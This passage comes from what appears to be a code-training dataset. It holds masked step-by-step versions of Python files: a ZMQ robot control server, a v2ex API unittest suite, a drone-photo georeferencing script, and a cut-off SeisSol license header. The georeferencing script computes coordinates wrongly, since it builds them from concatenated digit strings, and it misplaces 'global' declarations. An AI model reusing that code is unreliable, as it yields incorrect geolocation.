messages (which give the objects/methods exposed by the API),\n and exit messages.\n\n CtrlServer is the primary owner of bot resources, which we call\n systems. For example, it's CtrlServer that instantiates gunner\n and follower. Through those two, CtrlServer owns the gun, the\n IR hub, the turret and basically every other bot system.\n\n The messages that CtrlServer accepts and responds with are fully\n specified in lib.messages. Make any changes to messages there.\n\n CtrlServer can be instructed (via the API) to spawn a new thread\n for a PubServer. When that happens, CtrlServer passes its systems\n to PubServer, which can read their state and publish it over a\n ZMQ PUB socket.\n\n \"\"\"\n\n def __init__(self, testing=None, config_file='bot/config.yaml'):\n \"\"\"Build ZMQ REP socket and instantiate bot systems.\n\n :param testing: True if running on simulated HW, False if on bot.\n :type testing: boolean\n :param config_file: Name of file to read configuration from.\n :type config_file: string\n\n \"\"\"\n signal.signal(signal.SIGINT, self.signal_handler)\n self.config = lib.get_config(config_file)\n self.logger = lib.get_logger()\n if testing is True or testing == 'True':\n self.logger.info('CtrlServer running in test mode')\n lib.set_testing(True)\n elif testing is None:\n self.logger.info('Defaulting to config testing flag: {}'.format\n (self.config['testing']))\n lib.set_testing(self.config['testing'])\n else:\n self.logger.info('CtrlServer running in non-test mode')\n lib.set_testing(False)\n self.context = zmq.Context()\n self.ctrl_sock = self.context.socket(zmq.REP)\n self.server_bind_addr = '{protocol}://{host}:{port}'.format(protocol\n =self.config['server_protocol'], host=self.config[\n 'server_bind_host'], port=self.config['ctrl_server_port'])\n try:\n self.ctrl_sock.bind(self.server_bind_addr)\n except zmq.ZMQError:\n self.logger.error('ZMQ error. Is a server already running?')\n self.logger.warning('May be connected to an old server instance.')\n sys.exit(1)\n self.systems = self.assign_subsystems()\n self.logger.info('Control server initialized')\n self.pub_server = None\n\n def signal_handler(self, signal, frame):\n self.logger.info('Caught SIGINT (Ctrl+C), closing cleanly')\n self.clean_up()\n self.logger.info('Cleaned up bot, exiting...')\n sys.exit(0)\n\n def assign_subsystems(self):\n \"\"\"Instantiates and stores references to bot subsystems.\n\n :returns: Dict of subsystems, maps system name to instantiated object.\n\n \"\"\"\n self.driver = MecDriver()\n systems = {}\n systems['ctrl'] = self\n systems['driver'] = self.driver\n self.logger.debug('Systems: {}'.format(systems))\n return systems\n\n def listen(self):\n \"\"\"Perpetually listen for messages, pass them to generic handler.\"\"\"\n self.logger.info('Control server: {}'.format(self.server_bind_addr))\n while True:\n try:\n msg = self.ctrl_sock.recv_json()\n reply = self.handle_msg(msg)\n self.logger.debug('Sending: {}'.format(reply))\n self.ctrl_sock.send_json(reply)\n except JSONDecodeError:\n err_msg = 'Not a JSON message!'\n self.logger.warning(err_msg)\n self.ctrl_sock.send_json(msgs.error(err_msg))\n except KeyboardInterrupt:\n self.logger.info('Exiting control server. Bye!')\n self.clean_up()\n sys.exit(0)\n\n def handle_msg(self, msg):\n \"\"\"Generic message handler. Hands-off based on type of message.\n\n :param msg: Message, received via ZMQ from client, to handle.\n :type msg: dict\n :returns: An appropriate message reply dict, from lib.messages.\n\n \"\"\"\n self.logger.debug('Received: {}'.format(msg))\n try:\n msg_type = msg['type']\n except KeyError as e:\n return msgs.error(e)\n if msg_type == 'ping_req':\n reply = msgs.ping_reply()\n elif msg_type == 'list_req':\n reply = self.list_callables()\n elif msg_type == 'call_req':\n try:\n obj_name = msg['obj_name']\n method = msg['method']\n params = msg['params']\n reply = self.call_method(obj_name, method, params)\n except KeyError as e:\n return msgs.error(e)\n elif msg_type == 'exit_req':\n self.logger.info('Received message to die. Bye!')\n reply = msgs.exit_reply()\n self.logger.debug('Sending: {}'.format(reply))\n self.ctrl_sock.send_json(reply)\n self.clean_up()\n sys.exit(0)\n else:\n err_msg = 'Unrecognized message: {}'.format(msg)\n self.logger.warning(err_msg)\n reply = msgs.error(err_msg)\n return reply\n\n def list_callables(self):\n \"\"\"Build list of callable methods on each exported subsystem object.\n\n Uses introspection to create a list of callable methods for each\n registered subsystem object. Only methods which are flagged using the\n @lib.api_call decorator will be included.\n\n :returns: list_reply message with callable objects and their methods.\n\n \"\"\"\n self.logger.debug('List of callable API objects requested')\n callables = {}\n for name, obj in self.systems.items():\n methods = []\n for member in getmembers(obj):\n if is_api_method(obj, member[0]):\n methods.append(member[0])\n callables[name] = methods\n return msgs.list_reply(callables)\n\n def call_method(self, name, method, params):\n \"\"\"Call a previously registered subsystem method by name. Only\n methods tagged with the @api_call decorator can be called.\n\n :param name: Assigned name of the registered subsystem.\n :type name: string\n :param method: Subsystem method to be called.\n :type method: string\n :param params: Additional parameters for the called method.\n :type params: dict\n :returns: call_reply or error message dict to be sent to caller.\n\n \"\"\"\n self.logger.debug('API call: {}.{}({})'.format(name, method, params))\n if name in self.systems:\n obj = self.systems[name]\n if is_api_method(obj, method):\n try:\n call_return = getattr(obj, method)(**params)\n msg = 'Called {}.{}'.format(name, method)\n self.logger.debug(msg + ',returned:{}'.format(call_return))\n return msgs.call_reply(msg, call_return)\n except TypeError:\n err_msg = 'Invalid params for {}.{}'.format(name, method)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n except Exception as e:\n err_msg = \"Exception: '{}'\".format(str(e))\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n else:\n err_msg = \"Invalid method: '{}.{}'\".format(name, method)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n else:\n err_msg = \"Invalid object: '{}'\".format(name)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n\n @lib.api_call\n def echo(self, msg=None):\n \"\"\"Echo a message back to the caller.\n\n :param msg: Message to be echoed back to caller, default is None.\n :returns: Message given by param, defaults to None.\n\n \"\"\"\n return msg\n\n @lib.api_call\n def exception(self):\n \"\"\"Raise a test exception which will be returned to the caller.\"\"\"\n raise Exception('Exception test')\n\n @lib.api_call\n def spawn_pub_server(self):\n \"\"\"Spawn publisher thread.\"\"\"\n if self.pub_server is None:\n self.pub_server = pub_server_mod.PubServer(self.systems)\n self.pub_server.setDaemon(True)\n self.pub_server.start()\n msg = 'Spawned pub server'\n self.logger.info(msg)\n return msg\n else:\n err_msg = 'PubServer is already running'\n self.logger.warning(err_msg)\n return err_msg\n\n @lib.api_call\n def stop_full(self):\n \"\"\"Stop all drive and gun motors, set turret to safe state.\"\"\"\n self.systems['driver'].move(0, 0)\n\n def clean_up(self):\n \"\"\"Tear down ZMQ socket.\"\"\"\n self.stop_full()\n self.ctrl_sock.close()\n self.context.term()\n\n\nif __name__ == '__main__':\n if len(sys.argv) == 2:\n server = CtrlServer(sys.argv[1])\n else:\n server = CtrlServer()\n server.listen()\n", "step-5": "#!/usr/bin/env python\n\"\"\"Server that accepts and executes control-type commands on the bot.\"\"\"\n\nimport sys\nimport os\nfrom inspect import getmembers, ismethod\nfrom simplejson.decoder import JSONDecodeError\nimport zmq\nimport signal\n\n# This is required to make imports work\nsys.path = [os.getcwd()] + sys.path\n\nimport bot.lib.lib as lib\nimport pub_server as pub_server_mod\nimport bot.lib.messages as msgs\n\nfrom bot.driver.mec_driver import MecDriver\n\n\ndef is_api_method(obj, name):\n \"\"\"Tests whether named method exists in obj and is flagged for API export.\n\n :param obj: API-exported object to search for the given method on.\n :type ojb: string\n :param name: Name of method to check for.\n :type name: string\n :returns: True if given method is on given obj and is exported, else False.\n\n \"\"\"\n try:\n method = getattr(obj, name)\n except AttributeError:\n return False\n return (ismethod(method) and hasattr(method, \"__api_call\"))\n\n\nclass CtrlServer(object):\n\n \"\"\"Exports bot control via ZMQ.\n\n Most functionally exported by CtrlServer is in the form of methods\n exposed by the API. @lib.api_call decorators can be added to bot\n systems, which tags them for export. They can then be called\n remotely via CtrlClient, which is typically owned by an interface\n like the CLI, which typically accepts commands from an agent like\n a human.\n\n Some control is exported directly by CtrlServer, not through the\n API. For example, CtrlServer responds directly to ping messages,\n list messages (which give the objects/methods exposed by the API),\n and exit messages.\n\n CtrlServer is the primary owner of bot resources, which we call\n systems. For example, it's CtrlServer that instantiates gunner\n and follower. Through those two, CtrlServer owns the gun, the\n IR hub, the turret and basically every other bot system.\n\n The messages that CtrlServer accepts and responds with are fully\n specified in lib.messages. Make any changes to messages there.\n\n CtrlServer can be instructed (via the API) to spawn a new thread\n for a PubServer. When that happens, CtrlServer passes its systems\n to PubServer, which can read their state and publish it over a\n ZMQ PUB socket.\n\n \"\"\"\n\n def __init__(self, testing=None, config_file=\"bot/config.yaml\"):\n \"\"\"Build ZMQ REP socket and instantiate bot systems.\n\n :param testing: True if running on simulated HW, False if on bot.\n :type testing: boolean\n :param config_file: Name of file to read configuration from.\n :type config_file: string\n\n \"\"\"\n # Register signal handler, shut down cleanly (think motors)\n signal.signal(signal.SIGINT, self.signal_handler)\n\n # Load configuration and logger\n self.config = lib.get_config(config_file)\n self.logger = lib.get_logger()\n\n # Testing flag will cause objects to run on simulated hardware\n if testing is True or testing == \"True\":\n self.logger.info(\"CtrlServer running in test mode\")\n lib.set_testing(True)\n elif testing is None:\n self.logger.info(\n \"Defaulting to config testing flag: {}\".format(\n self.config[\"testing\"]))\n lib.set_testing(self.config[\"testing\"])\n else:\n self.logger.info(\"CtrlServer running in non-test mode\")\n lib.set_testing(False)\n\n # Build socket to listen for requests\n self.context = zmq.Context()\n self.ctrl_sock = self.context.socket(zmq.REP)\n self.server_bind_addr = \"{protocol}://{host}:{port}\".format(\n protocol=self.config[\"server_protocol\"],\n host=self.config[\"server_bind_host\"],\n port=self.config[\"ctrl_server_port\"])\n try:\n self.ctrl_sock.bind(self.server_bind_addr)\n except zmq.ZMQError:\n self.logger.error(\"ZMQ error. Is a server already running?\")\n self.logger.warning(\"May be connected to an old server instance.\")\n sys.exit(1)\n\n self.systems = self.assign_subsystems()\n self.logger.info(\"Control server initialized\")\n\n # Don't spawn pub_server until told to\n self.pub_server = None\n\n def signal_handler(self, signal, frame):\n self.logger.info(\"Caught SIGINT (Ctrl+C), closing cleanly\")\n self.clean_up()\n self.logger.info(\"Cleaned up bot, exiting...\")\n sys.exit(0)\n\n def assign_subsystems(self):\n \"\"\"Instantiates and stores references to bot subsystems.\n\n :returns: Dict of subsystems, maps system name to instantiated object.\n\n \"\"\"\n\n self.driver = MecDriver()\n\n systems = {}\n systems[\"ctrl\"] = self\n systems[\"driver\"] = self.driver\n\n self.logger.debug(\"Systems: {}\".format(systems))\n return systems\n\n def listen(self):\n \"\"\"Perpetually listen for messages, pass them to generic handler.\"\"\"\n self.logger.info(\"Control server: {}\".format(self.server_bind_addr))\n while True:\n try:\n msg = self.ctrl_sock.recv_json()\n reply = self.handle_msg(msg)\n self.logger.debug(\"Sending: {}\".format(reply))\n self.ctrl_sock.send_json(reply)\n except JSONDecodeError:\n err_msg = \"Not a JSON message!\"\n self.logger.warning(err_msg)\n self.ctrl_sock.send_json(msgs.error(err_msg))\n except KeyboardInterrupt:\n self.logger.info(\"Exiting control server. Bye!\")\n self.clean_up()\n sys.exit(0)\n\n def handle_msg(self, msg):\n \"\"\"Generic message handler. Hands-off based on type of message.\n\n :param msg: Message, received via ZMQ from client, to handle.\n :type msg: dict\n :returns: An appropriate message reply dict, from lib.messages.\n\n \"\"\"\n self.logger.debug(\"Received: {}\".format(msg))\n\n try:\n msg_type = msg[\"type\"]\n except KeyError as e:\n return msgs.error(e)\n\n if msg_type == \"ping_req\":\n reply = msgs.ping_reply()\n elif msg_type == \"list_req\":\n reply = self.list_callables()\n elif msg_type == \"call_req\":\n try:\n obj_name = msg[\"obj_name\"]\n method = msg[\"method\"]\n params = msg[\"params\"]\n reply = self.call_method(obj_name, method, params)\n except KeyError as e:\n return msgs.error(e)\n elif msg_type == \"exit_req\":\n self.logger.info(\"Received message to die. Bye!\")\n reply = msgs.exit_reply()\n # Need to actually send reply here as we're about to exit\n self.logger.debug(\"Sending: {}\".format(reply))\n self.ctrl_sock.send_json(reply)\n self.clean_up()\n sys.exit(0)\n else:\n err_msg = \"Unrecognized message: {}\".format(msg)\n self.logger.warning(err_msg)\n reply = msgs.error(err_msg)\n return reply\n\n def list_callables(self):\n \"\"\"Build list of callable methods on each exported subsystem object.\n\n Uses introspection to create a list of callable methods for each\n registered subsystem object. Only methods which are flagged using the\n @lib.api_call decorator will be included.\n\n :returns: list_reply message with callable objects and their methods.\n\n \"\"\"\n self.logger.debug(\"List of callable API objects requested\")\n # Dict of subsystem object names to their callable methods.\n callables = {}\n for name, obj in self.systems.items():\n methods = []\n # Filter out methods which are not explicitly flagged for export\n for member in getmembers(obj):\n if is_api_method(obj, member[0]):\n methods.append(member[0])\n callables[name] = methods\n return msgs.list_reply(callables)\n\n def call_method(self, name, method, params):\n \"\"\"Call a previously registered subsystem method by name. Only\n methods tagged with the @api_call decorator can be called.\n\n :param name: Assigned name of the registered subsystem.\n :type name: string\n :param method: Subsystem method to be called.\n :type method: string\n :param params: Additional parameters for the called method.\n :type params: dict\n :returns: call_reply or error message dict to be sent to caller.\n\n \"\"\"\n self.logger.debug(\"API call: {}.{}({})\".format(name, method, params))\n if name in self.systems:\n obj = self.systems[name]\n if is_api_method(obj, method):\n try:\n # Calls given obj.method, unpacking and passing params dict\n call_return = getattr(obj, method)(**params)\n msg = \"Called {}.{}\".format(name, method)\n self.logger.debug(msg + \",returned:{}\".format(call_return))\n return msgs.call_reply(msg, call_return)\n except TypeError:\n # Raised when we have a mismatch of the method's kwargs\n # TODO: Return argspec here?\n err_msg = \"Invalid params for {}.{}\".format(name, method)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n except Exception as e:\n # Catch exception raised by called method, notify client\n err_msg = \"Exception: '{}'\".format(str(e))\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n else:\n err_msg = \"Invalid method: '{}.{}'\".format(name, method)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n else:\n err_msg = \"Invalid object: '{}'\".format(name)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n\n @lib.api_call\n def echo(self, msg=None):\n \"\"\"Echo a message back to the caller.\n\n :param msg: Message to be echoed back to caller, default is None.\n :returns: Message given by param, defaults to None.\n\n \"\"\"\n return msg\n\n @lib.api_call\n def exception(self):\n \"\"\"Raise a test exception which will be returned to the caller.\"\"\"\n raise Exception(\"Exception test\")\n\n @lib.api_call\n def spawn_pub_server(self):\n \"\"\"Spawn publisher thread.\"\"\"\n if self.pub_server is None:\n self.pub_server = pub_server_mod.PubServer(self.systems)\n # Prevent pub_server thread from blocking the process from closing\n self.pub_server.setDaemon(True)\n self.pub_server.start()\n msg = \"Spawned pub server\"\n self.logger.info(msg)\n return msg\n else:\n err_msg = \"PubServer is already running\"\n self.logger.warning(err_msg)\n return err_msg\n\n @lib.api_call\n def stop_full(self):\n \"\"\"Stop all drive and gun motors, set turret to safe state.\"\"\"\n self.systems[\"driver\"].move(0, 0)\n\n def clean_up(self):\n \"\"\"Tear down ZMQ socket.\"\"\"\n self.stop_full()\n self.ctrl_sock.close()\n self.context.term()\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 2:\n server = CtrlServer(sys.argv[1])\n else:\n server = CtrlServer()\n server.listen()\n", "step-ids": [ 10, 13, 16, 18, 19 ] }
[ 10, 13, 16, 18, 19 ]
from funct import read_excel import requests import unittest import HTMLTestReportCN class v2exapi(unittest.TestCase): def test_node_api(self): url = "https://www.v2ex.com/api/nodes/show.json" #querystring = {"name":"php"} a=read_excel("xx.xlsx",0,0) for node_name in a: #for node_name in ['php',"python","qna"]: response = requests.request("GET", url, params={"name":node_name}).json() self.assertEqual(response['name'],node_name) print(response) def test_nade_type(self): url = "https://www.apiopen.top/novelSearchApi" querystring = {"name": "%E7%9B%98%E9%BE%99"} headers = { 'Cache-Control': "no-cache", 'Postman-Token': "b249737d-aa24-4592-adf1-d19114f3f567" } response = requests.request("GET", url, headers=headers, params=querystring) print(response.text) if __name__ == '__main__': #unittest.main() suiteTest = unittest.TestSuite() suiteTest.addTest(unittest.makeSuite(v2exapi)) filepath = '' + 'report.html' # filepath='C:\\'+now+'.html' fp = open(filepath, 'wb') # 定义测试报告的标题与描述 runner = HTMLTestReportCN.HTMLTestRunner(stream=fp, title=u'自动化测试报告', description=u'测试报告') runner.run(suiteTest) fp.close() #print(type(list1))
normal
{ "blob_id": "5cd573f2b7f91a8b20e96deb1004c0ef7fc62398", "index": 8072, "step-1": "<mask token>\n\n\nclass v2exapi(unittest.TestCase):\n\n def test_node_api(self):\n url = 'https://www.v2ex.com/api/nodes/show.json'\n a = read_excel('xx.xlsx', 0, 0)\n for node_name in a:\n response = requests.request('GET', url, params={'name': node_name}\n ).json()\n self.assertEqual(response['name'], node_name)\n print(response)\n <mask token>\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass v2exapi(unittest.TestCase):\n\n def test_node_api(self):\n url = 'https://www.v2ex.com/api/nodes/show.json'\n a = read_excel('xx.xlsx', 0, 0)\n for node_name in a:\n response = requests.request('GET', url, params={'name': node_name}\n ).json()\n self.assertEqual(response['name'], node_name)\n print(response)\n\n def test_nade_type(self):\n url = 'https://www.apiopen.top/novelSearchApi'\n querystring = {'name': '%E7%9B%98%E9%BE%99'}\n headers = {'Cache-Control': 'no-cache', 'Postman-Token':\n 'b249737d-aa24-4592-adf1-d19114f3f567'}\n response = requests.request('GET', url, headers=headers, params=\n querystring)\n print(response.text)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass v2exapi(unittest.TestCase):\n\n def test_node_api(self):\n url = 'https://www.v2ex.com/api/nodes/show.json'\n a = read_excel('xx.xlsx', 0, 0)\n for node_name in a:\n response = requests.request('GET', url, params={'name': node_name}\n ).json()\n self.assertEqual(response['name'], node_name)\n print(response)\n\n def test_nade_type(self):\n url = 'https://www.apiopen.top/novelSearchApi'\n querystring = {'name': '%E7%9B%98%E9%BE%99'}\n headers = {'Cache-Control': 'no-cache', 'Postman-Token':\n 'b249737d-aa24-4592-adf1-d19114f3f567'}\n response = requests.request('GET', url, headers=headers, params=\n querystring)\n print(response.text)\n\n\nif __name__ == '__main__':\n suiteTest = unittest.TestSuite()\n suiteTest.addTest(unittest.makeSuite(v2exapi))\n filepath = '' + 'report.html'\n fp = open(filepath, 'wb')\n runner = HTMLTestReportCN.HTMLTestRunner(stream=fp, title=u'自动化测试报告',\n description=u'测试报告')\n runner.run(suiteTest)\n fp.close()\n", "step-4": "from funct import read_excel\nimport requests\nimport unittest\nimport HTMLTestReportCN\n\n\nclass v2exapi(unittest.TestCase):\n\n def test_node_api(self):\n url = 'https://www.v2ex.com/api/nodes/show.json'\n a = read_excel('xx.xlsx', 0, 0)\n for node_name in a:\n response = requests.request('GET', url, params={'name': node_name}\n ).json()\n self.assertEqual(response['name'], node_name)\n print(response)\n\n def test_nade_type(self):\n url = 'https://www.apiopen.top/novelSearchApi'\n querystring = {'name': '%E7%9B%98%E9%BE%99'}\n headers = {'Cache-Control': 'no-cache', 'Postman-Token':\n 'b249737d-aa24-4592-adf1-d19114f3f567'}\n response = requests.request('GET', url, headers=headers, params=\n querystring)\n print(response.text)\n\n\nif __name__ == '__main__':\n suiteTest = unittest.TestSuite()\n suiteTest.addTest(unittest.makeSuite(v2exapi))\n filepath = '' + 'report.html'\n fp = open(filepath, 'wb')\n runner = HTMLTestReportCN.HTMLTestRunner(stream=fp, title=u'自动化测试报告',\n description=u'测试报告')\n runner.run(suiteTest)\n fp.close()\n", "step-5": "from funct import read_excel\nimport requests\nimport unittest\nimport HTMLTestReportCN\nclass v2exapi(unittest.TestCase):\n def test_node_api(self):\n url = \"https://www.v2ex.com/api/nodes/show.json\"\n\n #querystring = {\"name\":\"php\"}\n a=read_excel(\"xx.xlsx\",0,0)\n for node_name in a:\n #for node_name in ['php',\"python\",\"qna\"]:\n\n\n response = requests.request(\"GET\", url, params={\"name\":node_name}).json()\n self.assertEqual(response['name'],node_name)\n print(response)\n def test_nade_type(self):\n\n\n url = \"https://www.apiopen.top/novelSearchApi\"\n\n querystring = {\"name\": \"%E7%9B%98%E9%BE%99\"}\n\n headers = {\n 'Cache-Control': \"no-cache\",\n 'Postman-Token': \"b249737d-aa24-4592-adf1-d19114f3f567\"\n }\n\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n\n print(response.text)\n\n\nif __name__ == '__main__':\n #unittest.main()\n suiteTest = unittest.TestSuite()\n suiteTest.addTest(unittest.makeSuite(v2exapi))\n filepath = '' + 'report.html'\n\n # filepath='C:\\\\'+now+'.html'\n\n fp = open(filepath, 'wb')\n # 定义测试报告的标题与描述\n runner = HTMLTestReportCN.HTMLTestRunner(stream=fp, title=u'自动化测试报告', description=u'测试报告')\n runner.run(suiteTest)\n fp.close()\n\n\n\n\n#print(type(list1))", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
import glob from PIL import Image from PIL.ExifTags import TAGS, GPSTAGS from pyproj import Proj from osgeo import gdal, osr from PyQt4.QtCore import QFile, QFileInfo import os from os import walk #slika="c:\slike\Zito\DJI_0060.jpg" #georef_slika="c:\Slike\Zito\Georeferencirana.tif" radni_dir = 'c:/slike/Zito/testiranje/' #-----------------Izvlaci LAT LONG---------------------------------------------------------------------------- def exif(img): exif_data = {} try: i = Image.open(img) tags = i._getexif() for tag, value in tags.items(): decoded = TAGS.get(tag, tag) exif_data[decoded] = value except: pass return exif_data def dms2dd(d, m, s, i): sec = float((m * 60) + s) dec = float(sec / 3600) deg = float(d + dec) if i.upper() == "W": deg = deg * -1 elif i.upper() == "S": deg = deg * -1 return float(deg) def gps(exif): lat = None lon = None if exif["GPSInfo"]: # Lat coords = exif["GPSInfo"] i = coords[1] d = coords[2][0][0] m = coords[2][1][0] s = coords[2][2][0] lat = dms2dd(d, m ,s, i) lat = float(str(d)+str(m)+str(s))/100000000 # Lon i = coords[3] d = coords[4][0][0] m = coords[4][1][0] s = coords[4][2][0] lon = float(str(d)+str(m)+str(s))/100000000 return lat, lon #------------------Pretvara LAT LONG u UTM---------------------------------------------------------------------------- def pretvarac(fotka): Lat = gps(exif(fotka))[0] Lon = gps(exif(fotka))[1] print "Lon/Lat Koordinate slike: ", Lon, " ",Lat ZoneNo = "34T" # rucno uneseno, a moze se izracunati unaprijed preko alt long myProj = Proj("+proj=utm +zone="+ZoneNo+",+north +ellps=WGS84 +datum=WGS84 +units=m +no_defs") # north za sjevernu hemisferu UTMx, UTMy = myProj(Lon, Lat) round(UTMx, 2) round(UTMy, 2) print "UTM Koordinate slike: ", UTMx, " ",UTMy global UTMx global UTMy return UTMx, UTMy #--------------------Georeferenciranje---------------------------------------------------------------------------- def georeferenciranje(src_filename,dst_filename): src_ds = gdal.Open(src_filename) format = "GTiff" driver = gdal.GetDriverByName(format) dst_ds = driver.CreateCopy(dst_filename, src_ds, 0) # Specify raster location through geotransform array # (uperleftx, scalex, skewx, uperlefty, skewy, scaley) # Scale = size of one pixel in units of raster projection # this example below assumes 100x100 gt = [UTMx, 100, 0, UTMy, 0, -100] dst_ds.SetGeoTransform(gt) epsg = 3857 srs = osr.SpatialReference() srs.ImportFromEPSG(epsg) dest_wkt = srs.ExportToWkt() dst_ds.SetProjection(dest_wkt) dst_ds = None src_ds = None #-----------------Ubacivanje u QGIS---------------------------------------------------------------------------- def ubacivanje(fileName): print "ubacujem raster" #fileName = dst_filename fileInfo = QFileInfo(fileName) baseName = fileInfo.baseName() rlayer = QgsRasterLayer(fileName, baseName) iface.addRasterLayer(fileName, "Raster Layer Zito") print "raster ubacen" #----------------Folder loop------------------------------------------------------------------------------------ li = [] l = 0 os.chdir(radni_dir) #Uzima listu sa imenima slika ( li ) for file in glob.glob("*.jpg"): li.append(os.path.splitext(file)[0]) l+= 1 pretvarac(file) gr = os.path.dirname(file)+str(l)+ '_georeferencirana'+'.tif' georeferenciranje(file,gr) ubacivanje(gr) #pretvarac(slika) #georeferenciranje(slika,georef_slika) #ubacivanje(georef_slika)
normal
{ "blob_id": "e92d770f9d2176b4943653b09ac1069fa3301e46", "index": 1931, "step-1": "import glob\r\nfrom PIL import Image\r\nfrom PIL.ExifTags import TAGS, GPSTAGS\r\nfrom pyproj import Proj\r\nfrom osgeo import gdal, osr\r\nfrom PyQt4.QtCore import QFile, QFileInfo\r\nimport os\r\nfrom os import walk\r\n#slika=\"c:\\slike\\Zito\\DJI_0060.jpg\"\r\n#georef_slika=\"c:\\Slike\\Zito\\Georeferencirana.tif\"\r\nradni_dir = 'c:/slike/Zito/testiranje/'\r\n#-----------------Izvlaci LAT LONG----------------------------------------------------------------------------\r\ndef exif(img):\r\n exif_data = {}\r\n try: \r\n i = Image.open(img)\r\n tags = i._getexif()\r\n for tag, value in tags.items():\r\n decoded = TAGS.get(tag, tag)\r\n exif_data[decoded] = value\r\n except:\r\n pass\r\n return exif_data\r\n \r\ndef dms2dd(d, m, s, i):\r\n sec = float((m * 60) + s)\r\n dec = float(sec / 3600)\r\n deg = float(d + dec)\r\n if i.upper() == \"W\":\r\n deg = deg * -1\r\n elif i.upper() == \"S\":\r\n deg = deg * -1\r\n return float(deg)\r\n \r\ndef gps(exif):\r\n lat = None\r\n lon = None\r\n if exif[\"GPSInfo\"]: \r\n # Lat\r\n coords = exif[\"GPSInfo\"]\r\n i = coords[1]\r\n d = coords[2][0][0]\r\n m = coords[2][1][0]\r\n s = coords[2][2][0]\r\n lat = dms2dd(d, m ,s, i)\r\n lat = float(str(d)+str(m)+str(s))/100000000\r\n # Lon\r\n i = coords[3]\r\n d = coords[4][0][0]\r\n m = coords[4][1][0]\r\n s = coords[4][2][0]\r\n lon = float(str(d)+str(m)+str(s))/100000000\r\n return lat, lon\r\n\r\n#------------------Pretvara LAT LONG u UTM----------------------------------------------------------------------------\r\ndef pretvarac(fotka):\r\n Lat = gps(exif(fotka))[0]\r\n Lon = gps(exif(fotka))[1]\r\n print \"Lon/Lat Koordinate slike: \", Lon, \" \",Lat\r\n ZoneNo = \"34T\" # rucno uneseno, a moze se izracunati unaprijed preko alt long\r\n myProj = Proj(\"+proj=utm +zone=\"+ZoneNo+\",+north +ellps=WGS84 +datum=WGS84 +units=m +no_defs\") # north za sjevernu hemisferu\r\n UTMx, UTMy = myProj(Lon, Lat)\r\n round(UTMx, 2)\r\n round(UTMy, 2)\r\n print \"UTM Koordinate slike: \", UTMx, \" \",UTMy\r\n global UTMx\r\n global UTMy\r\n return UTMx, UTMy\r\n\r\n#--------------------Georeferenciranje----------------------------------------------------------------------------\r\ndef georeferenciranje(src_filename,dst_filename):\r\n src_ds = gdal.Open(src_filename)\r\n format = \"GTiff\"\r\n driver = gdal.GetDriverByName(format)\r\n dst_ds = driver.CreateCopy(dst_filename, src_ds, 0)\r\n\r\n # Specify raster location through geotransform array\r\n # (uperleftx, scalex, skewx, uperlefty, skewy, scaley)\r\n # Scale = size of one pixel in units of raster projection\r\n # this example below assumes 100x100\r\n gt = [UTMx, 100, 0, UTMy, 0, -100]\r\n\r\n dst_ds.SetGeoTransform(gt)\r\n epsg = 3857\r\n srs = osr.SpatialReference()\r\n srs.ImportFromEPSG(epsg)\r\n dest_wkt = srs.ExportToWkt()\r\n dst_ds.SetProjection(dest_wkt)\r\n dst_ds = None\r\n src_ds = None\r\n#-----------------Ubacivanje u QGIS----------------------------------------------------------------------------\r\ndef ubacivanje(fileName):\r\n print \"ubacujem raster\"\r\n #fileName = dst_filename\r\n fileInfo = QFileInfo(fileName)\r\n baseName = fileInfo.baseName()\r\n rlayer = QgsRasterLayer(fileName, baseName)\r\n iface.addRasterLayer(fileName, \"Raster Layer Zito\")\r\n print \"raster ubacen\"\r\n\r\n#----------------Folder loop------------------------------------------------------------------------------------\r\nli = []\r\nl = 0\r\nos.chdir(radni_dir)\r\n#Uzima listu sa imenima slika ( li )\r\nfor file in glob.glob(\"*.jpg\"):\r\n li.append(os.path.splitext(file)[0])\r\n l+= 1\r\n pretvarac(file)\r\n gr = os.path.dirname(file)+str(l)+ '_georeferencirana'+'.tif'\r\n georeferenciranje(file,gr)\r\n ubacivanje(gr)\r\n \r\n\r\n\r\n\r\n#pretvarac(slika)\r\n#georeferenciranje(slika,georef_slika)\r\n#ubacivanje(georef_slika)\r\n\r\n\r\n\r\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
#!/usr/bin/python ## # @file # This file is part of SeisSol. # # @author Sebastian Rettenberger (rettenbs AT in.tum.de, http://www5.in.tum.de/wiki/index.php/Sebastian_Rettenberger,_M.Sc.) # # @section LICENSE # Copyright (c) 2013, SeisSol Group # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from this # software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS 